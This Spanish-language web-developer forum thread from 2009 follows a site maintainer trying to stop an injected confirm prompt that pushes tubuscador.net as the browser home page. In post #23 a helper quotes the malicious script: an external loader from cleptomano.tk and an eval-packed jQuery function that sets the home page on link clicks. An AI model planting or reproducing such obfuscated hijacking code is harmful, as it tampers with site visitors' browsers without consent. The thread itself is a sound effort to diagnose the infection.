Foros del Web » Creando para Internet » HTML »

Capar las ventanitas (confirm, pop-up...)

Estas en el tema de Capar las ventanitas (confirm, pop-up...) en el foro de HTML en Foros del Web. Me gustaría capar de mi página cualquier ventanita que pueda saltar, como lo que hace Mozilla. ¿Es posible?...
  #1 (permalink)  
Antiguo 18/08/2009, 14:25
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Capar las ventanitas (confirm, pop-up...)

Me gustaría capar de mi página cualquier ventanita que pueda saltar, como lo que hace Mozilla. ¿Es posible?
  #2 (permalink)  
Antiguo 18/08/2009, 21:40
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.728
Antigüedad: 8 años, 6 meses
Puntos: 1512
Respuesta: Capar las ventanitas (confirm, pop-up...)

Podrias detallar lo que quieres.
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #3 (permalink)  
Antiguo 19/08/2009, 03:46
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Exclamación Respuesta: Capar las ventanitas (confirm, pop-up...)

Tengo un problema y es que se me han insertado en mi página un mensaje que salta cada vez que pincho en algún enlace. El mensaje sale en una ventanita tipo confirm de javascript preguntando si quiero establecer la página tubuscador.net como página de inicio.

Como de momento no soy capaz de localizar qué es lo que han hecho, me gustaría poner una solución de emergencia que podría ser bloquear este tipo de ventanas. No sé si hay algún código para ello. Sé que se puede a través del navegador, pero eso me vale a mí y a nadie más.

Espero que ahora haya quedado más claro :)

Gracias de antemano.
  #4 (permalink)  
Antiguo 19/08/2009, 08:40
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.728
Antigüedad: 8 años, 6 meses
Puntos: 1512
Respuesta: Capar las ventanitas (confirm, pop-up...)

¿Y por qué no puedes quitar tu el mensaje de esa pagina?
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #5 (permalink)  
Antiguo 19/08/2009, 09:33
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Porque no soy capaz de momento. En el código no lo veo. Estoy un poco verde en esto de la seguridad...
  #6 (permalink)  
Antiguo 19/08/2009, 10:23
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.728
Antigüedad: 8 años, 6 meses
Puntos: 1512
Respuesta: Capar las ventanitas (confirm, pop-up...)

Ok, para obtener los alert puedes hacerlo de esta forma con javascript

Código html:
Ver original
  1. <script language="javascript">
  2. window.alert = function(){}
  3. alert();
  4. alert();
  5. alert();
  6. alert();

Si le quitas las lineas vas a ver que te van a salir los 4 alert
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #7 (permalink)  
Antiguo 19/08/2009, 10:36
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Cita:
Iniciado por abimaelrc Ver Mensaje
Ok, para obtener los alert puedes hacerlo de esta forma con javascript

Código html:
Ver original
  1. <script language="javascript">
  2. window.alert = function(){}
  3. alert();
  4. alert();
  5. alert();
  6. alert();

Si le quitas las lineas vas a ver que te van a salir los 4 alert
No entiendo bien qué puedo hacer con el javascript. ¿Incluyendolo en mi código no aparecerían más alert? En realidad es un confirm lo que me está saltando cada vez que pincho en un enlace.
  #8 (permalink)  
Antiguo 19/08/2009, 11:24
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.728
Antigüedad: 8 años, 6 meses
Puntos: 1512
Respuesta: Capar las ventanitas (confirm, pop-up...)

Pues en vez de escribir alert escribe confirm

Código html:
Ver original
  1. <script language="javascript">
  2. window.confirm = function(){}
  3. confirm();
  4. confirm();
  5. confirm();
  6. confirm();
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #9 (permalink)  
Antiguo 19/08/2009, 16:31
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

¿Pero lo meto en mi código o qué hago? Perdona la insistencia :S
  #10 (permalink)  
Antiguo 19/08/2009, 23:57
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.728
Antigüedad: 8 años, 6 meses
Puntos: 1512
Respuesta: Capar las ventanitas (confirm, pop-up...)

Tienes que llamarlo en la pagina que te este ocacionando el problema.
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #11 (permalink)  
Antiguo 20/08/2009, 05:00
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Cita:
Iniciado por abimaelrc Ver Mensaje
Tienes que llamarlo en la pagina que te este ocacionando el problema.
Osea incluirlo en el código de la página.
  #12 (permalink)  
Antiguo 20/08/2009, 09:31
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.728
Antigüedad: 8 años, 6 meses
Puntos: 1512
Respuesta: Capar las ventanitas (confirm, pop-up...)

Eso mismo. Tratalo y nos dejas saber.
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #13 (permalink)  
Antiguo 20/08/2009, 10:49
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Cita:
Iniciado por abimaelrc Ver Mensaje
Eso mismo. Tratalo y nos dejas saber.
Sin resultados :/
  #14 (permalink)  
Antiguo 20/08/2009, 11:06
Avatar de caricatos
Moderador
 
Fecha de Ingreso: abril-2002
Ubicación: Torremolinos (Málaga)
Mensajes: 19.547
Antigüedad: 15 años, 8 meses
Puntos: 1262
Respuesta: Capar las ventanitas (confirm, pop-up...)

Hola:

Parece el típico problema del servidor gratuito... si es ese el caso, lo mejor es buscar otro... además hay algunos de pago que son realmente baratos.

Avísanos si es el caso.

Saludos
__________________
Por favor:
No hagan preguntas de temas de foros en mensajes privados... no las respondo
  #15 (permalink)  
Antiguo 20/08/2009, 14:37
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Cita:
Iniciado por caricatos Ver Mensaje
Hola:

Parece el típico problema del servidor gratuito... si es ese el caso, lo mejor es buscar otro... además hay algunos de pago que son realmente baratos.

Avísanos si es el caso.

Saludos
No, es de pago y tampoco es publicidad porque he desactivado toda la de la página y sigue igual :S
  #16 (permalink)  
Antiguo 20/08/2009, 14:45
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.728
Antigüedad: 8 años, 6 meses
Puntos: 1512
Respuesta: Capar las ventanitas (confirm, pop-up...)

Bueno vas a tener que poner tu pagina para poder indicarte, y decirnos que es lo que haces para que salga el resultado que estas indicando. Asi poder ver si encontramos donde tienes que arreglar.
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #17 (permalink)  
Antiguo 21/08/2009, 03:34
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Mi página es punto com

A ver si vemos algo :/

Última edición por Rublo; 21/08/2009 a las 11:17
  #18 (permalink)  
Antiguo 22/08/2009, 14:17
Avatar de jomaruro
Colaborador
 
Fecha de Ingreso: junio-2002
Ubicación: Naboo
Mensajes: 5.442
Antigüedad: 15 años, 5 meses
Puntos: 361
Respuesta: Capar las ventanitas (confirm, pop-up...)

Hola:

Pon tu página para que te podamos ayudar.

Saludos.

  #19 (permalink)  
Antiguo 23/08/2009, 04:17
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Aparece cada vez que se pincha en cualquier enlace, incluso en la publicidad.
A ver si alguien me puede decir cómo sería el código de la ventanita que me han incluido en la página, así podría intentar buscarlo en el código que todavía no he sido capaz de dar con ello.

Gracias de antemano.

Última edición por Rublo; 24/08/2009 a las 09:32
  #20 (permalink)  
Antiguo 23/08/2009, 05:32
Avatar de jomaruro
Colaborador
 
Fecha de Ingreso: junio-2002
Ubicación: Naboo
Mensajes: 5.442
Antigüedad: 15 años, 5 meses
Puntos: 361
Respuesta: Capar las ventanitas (confirm, pop-up...)

Hola:

He hecho varias pruebas y la verdad, no veo ninguna ventanita por ningún lado ni en FF ni en IE7.

Saludos.

  #21 (permalink)  
Antiguo 23/08/2009, 14:01
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

¿No te aparece?¿No tendrás desactivadas las ventanas emergentes? A mí me sale con cualquier enlace una vez que se ha cargado la página del todo. Mismamente dándole a la cabecera.

Última edición por Rublo; 24/08/2009 a las 09:32
  #22 (permalink)  
Antiguo 23/08/2009, 14:19
Avatar de Myakire
Colaborador
 
Fecha de Ingreso: enero-2002
Ubicación: Centro de la república
Mensajes: 8.849
Antigüedad: 15 años, 10 meses
Puntos: 145
Respuesta: Capar las ventanitas (confirm, pop-up...)

No, no aparece nada de eso que mencionas en ningún browser todo en órden
  #23 (permalink)  
Antiguo 23/08/2009, 15:19
Colaborador
 
Fecha de Ingreso: junio-2007
Mensajes: 5.798
Antigüedad: 10 años, 6 meses
Puntos: 538
Respuesta: Capar las ventanitas (confirm, pop-up...)

Con FF no saltan, pero con ie7, hasta pinchando en las opciones del menú principal:



¿Has puesto tú este código que aparece al final de la página?
Cita:
<script type="text/javascript" src="http://cleptomano.tk/test/homepage/lib.js"/>

2/* ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++ */
3/**
4 * Escrito por: Richard Tr0n <[email protected]>
5 * Ultima fecha de modificación: 05/08/2009
6 *
7 * Dedicado a la nena más linda, Lady :)
8 */
9/* ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++ */
10
11
12/* ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++ */
13/* INICIO FUNCIONES */
14
15eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 6(){3 a=\'9://c.d.e/\';$(\'a\').f(2(){4.g.h=\'i(#j#k)\';7=4.l(a);5(!7) {4.m(a)}})}2 n(){5(!$.o.p){q r}3 a=\'s\';3 b=$.8(a);b=(b==t)?1:u(b)+1;$.8(a,b.v(),{w:\'/\',x:1});5(b>0){6()}}',34,34,'||function|var|this| if|__setHP|sQueryHome|cookie|http|||www|tubuscador|net|click|style|behavior|url|default|homepage|isHomeP age|setHomePage|__initHP|browser|msie|return|false |imbatyHomePage|null|parseInt|toString|path|expire s'.split('|'),0,{}))
16
17/* FIN FUNCIONES */
18/* ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++ */
19
20
21$(document).ready(__initHP);
</script>
__________________
Por una web con mucho estilo
+++ CUENTA ABANDONADA. ¿la quieres? +++
  #24 (permalink)  
Antiguo 23/08/2009, 15:58
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Cita:
Iniciado por kseso? Ver Mensaje
Con FF no saltan, pero con ie7, hasta pinchando en las opciones del menú principal:



¿Has puesto tú este código que aparece al final de la página?
No, eso no es mío ¿cómo has visto eso? Viendo el código fuente de la página con la opción que ofrece el ie, no me sale.
  #25 (permalink)  
Antiguo 23/08/2009, 16:06
Colaborador
 
Fecha de Ingreso: junio-2007
Mensajes: 5.798
Antigüedad: 10 años, 6 meses
Puntos: 538
Respuesta: Capar las ventanitas (confirm, pop-up...)

Firefox + firebug

¿Todo lo que hay en la página es tuyo?
__________________
Por una web con mucho estilo
+++ CUENTA ABANDONADA. ¿la quieres? +++
  #26 (permalink)  
Antiguo 23/08/2009, 16:08
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Llevo con la página mes y medio. Es una página que ya estaba hecha, he modificado e incorporado cosas, pero casi nada es mío. ¿Has visto alguna cosas más que sea rara?¿o por qué lo dices?
  #27 (permalink)  
Antiguo 23/08/2009, 16:30
Colaborador
 
Fecha de Ingreso: junio-2007
Mensajes: 5.798
Antigüedad: 10 años, 6 meses
Puntos: 538
Respuesta: Capar las ventanitas (confirm, pop-up...)

Lo siento, Rublo, pero no es mi fuerte la seguridad web.
Creo que te tocará investigar sobre el tema, deshabilitar script y frames, ver si vuelven a aparecer y limpiar el sitio.

Ahora al menos podrás decirle al propietario del sitio el origen del problema y que estás en ello.

Suerte.
__________________
Por una web con mucho estilo
+++ CUENTA ABANDONADA. ¿la quieres? +++
  #28 (permalink)  
Antiguo 23/08/2009, 16:40
 
Fecha de Ingreso: julio-2009
Mensajes: 92
Antigüedad: 8 años, 4 meses
Puntos: 0
Respuesta: Capar las ventanitas (confirm, pop-up...)

Cita:
Iniciado por kseso? Ver Mensaje
Lo siento, Rublo, pero no es mi fuerte la seguridad web.
Creo que te tocará investigar sobre el tema, deshabilitar script y frames, ver si vuelven a aparecer y limpiar el sitio.

Ahora al menos podrás decirle al propietario del sitio el origen del problema y que estás en ello.

Suerte.
Me has dado pistas. Muchas gracias por todo.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 05:26.